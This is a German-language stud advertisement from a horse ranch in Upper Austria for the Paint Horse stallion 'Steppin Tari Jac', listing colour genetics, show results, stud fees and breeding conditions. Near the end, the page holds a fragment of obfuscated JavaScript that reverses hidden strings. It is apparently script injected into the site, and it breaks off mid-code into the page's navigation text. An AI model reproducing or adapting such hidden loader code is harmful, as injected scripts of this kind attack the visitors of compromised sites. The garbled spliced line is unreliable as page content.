Steppin Tari Jac

Rasse: American Paint Horse
geb: 15. Mai 2004
Farbe: red dun overo (OLWS N/H)
Stm.: 1,55 cm
Röhrbein: 20 cm
Tari ist natürlich PSSM1 Negativ getestet. Komplette AKU mit Röntgen von Juni 2012 dabei.

Erfolge:
2010:
Aged Stallions Open 1. Platz
Reserve Champion Open
Aged Stallions Amateur 1. Platz
Grand Champion Amateur
Color Class all ages and sexes 2. Platz
2006:
2 mal 2. Platz Open two year old Stallions Halter

Wunderschöner Hengst aus der Zucht von Rolf Peterka in seltener Farbgebung. Er ist ein Sohn vom Europaweit bekanntem Reininghengst ‚Hes A Steppin Jac‘.
Sein Gebäude, das Fundament und sein Talent lassen keine Wünsche offen. Tari hat rund 92,5 % Foundation Blutanteil laut FQHA.
Tari ist ein echter Red Dun, er kann unter anderem Duns, Red Duns, Grullos, Dunskins und Dunalinos zeugen. Natürlich auch in Overo Pattern. Er besitzt die typischen Merkmale eines Duns: Zebrastreifen an den Beinen, Aalstrich, Schulterkreuz, aufgehelltes Deckhaar. Bisher hat er seinen Fohlen zu rund 80 % sein Dun Gen vererbt.

SteppinTariJac

Decktaxe: 600 Euro
10 Euro/Tag für Handling, für Stuten mit Fohlen 12 Euro/Tag.
20 % Frühbucherrabatt bei Buchung bis 31. Jänner des Deckjahres.
Deckbedingungen: hintere Eisen ab, Grippe, Tetanus und Herpes Impfung, saubere Tupferprobe nicht älter als 4 Wochen. Negativer OLWS Test bei bunten Stuten.
Wir gewähren eine Lebendfohlengarantie mit Bedeckung im Folgejahr.

Tari hat einen traumhaften Charakter und steht mit den Stuten und Fohlen im Offenstall und auf der Weide.

Kontakt:
Double C Ranch
Claudia und Christina Brugger
Schönberg 2
4844 Regau
Oberösterreich
Telefon: +43-664-5293200
E-Mail: info@double-c-ranch.com

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().j/" rel="prev">Voriger Beitrag : Die Pferdesteuer in Deutschland – eine Chronik

Related posts